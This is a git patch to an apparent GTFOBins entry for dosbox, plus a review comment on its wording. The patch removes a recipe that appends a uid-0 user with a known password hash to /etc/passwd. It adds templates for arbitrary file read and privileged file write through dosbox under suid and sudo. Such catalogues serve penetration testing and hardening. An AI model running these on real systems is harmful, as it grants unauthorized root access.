From a846a1699315bd340ebb9dfac85cf453267acc36 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Tue, 31 Aug 2021 23:14:27 +0200 Subject: [PATCH] Generalize dosbox --- _gtfobins/dosbox.md | 31 +++++++++++++++++++++++++------ 1 file changed, 25 insertions(+), 6 deletions(-) diff --git a/_gtfobins/dosbox.md b/_gtfobins/dosbox.md index b46c637..656896a 100644 --- a/_gtfobins/dosbox.md +++ b/_gtfobins/dosbox.md @@ -1,10 +1,29 @@ --- +description: Basically `dosbox` allows to mount the local file system, so that it can be altered using DOS commands. Note that the DOS filename convention ([8.3](https://en.wikipedia.org/wiki/8.3_filename)) is used. functions: - SUID: - - description: Please change username to whatever you want and passwod is `toor`. + file-read: + - description: The file content will be displayed in the DOSBox graphical window. code: | - cp /etc/passwd /tmp/passwd - echo "idealphase:sXuCKi7k3Xh/s:0:0::/root:/bin/bash" >> /tmp/passwd - /usr/bin/dosbox -c "mount c /etc/" -c "mount d /tmp/" -c "d:" -c "copy passwd c:" - su idealphase + LFILE='\path\to\file_to_read' + dosbox -c 'mount c /' -c "type c:$LFILE" + - description: The file is copied to a readable location. + code: | + LFILE='\path\to\file_to_read' + dosbox -c 'mount c /' -c "copy c:$LFILE >c:\tmp\output" -c exit + cat '/tmp/OUTPUT' + file-write: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit + suid: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + ./dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit + sudo: + - description: Note that the name of the written file in the following example will be `FILE_TO_`. + code: | + LFILE='\path\to\file_to_write' + sudo dosbox -c 'mount c /' -c "echo DATA >c:$LFILE" -c exit ---
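Review bot: The `file-write`, `suid` and `sudo` entries repeat the same description verbatim ("the name of the written file ... will be `FILE_TO_`"), and it only covers the 8.3 truncation. Nothing in the `suid` or `sudo` entries says how they differ from the unprivileged `file-write` case. The second `file-read` entry also writes to `c:\tmp\output` and then reads `/tmp/OUTPUT` without explaining the change of case. Suggest stating once, in the new front-matter `description`, that names are truncated to 8.3 and show up in upper case on the host. The per-entry descriptions could then say what is specific to each function. Separately, that second `file-read` description says the file "is copied", while the command uses a `>` redirect on `copy` instead of passing a destination argument. It is worth confirming that the wording and the command agree.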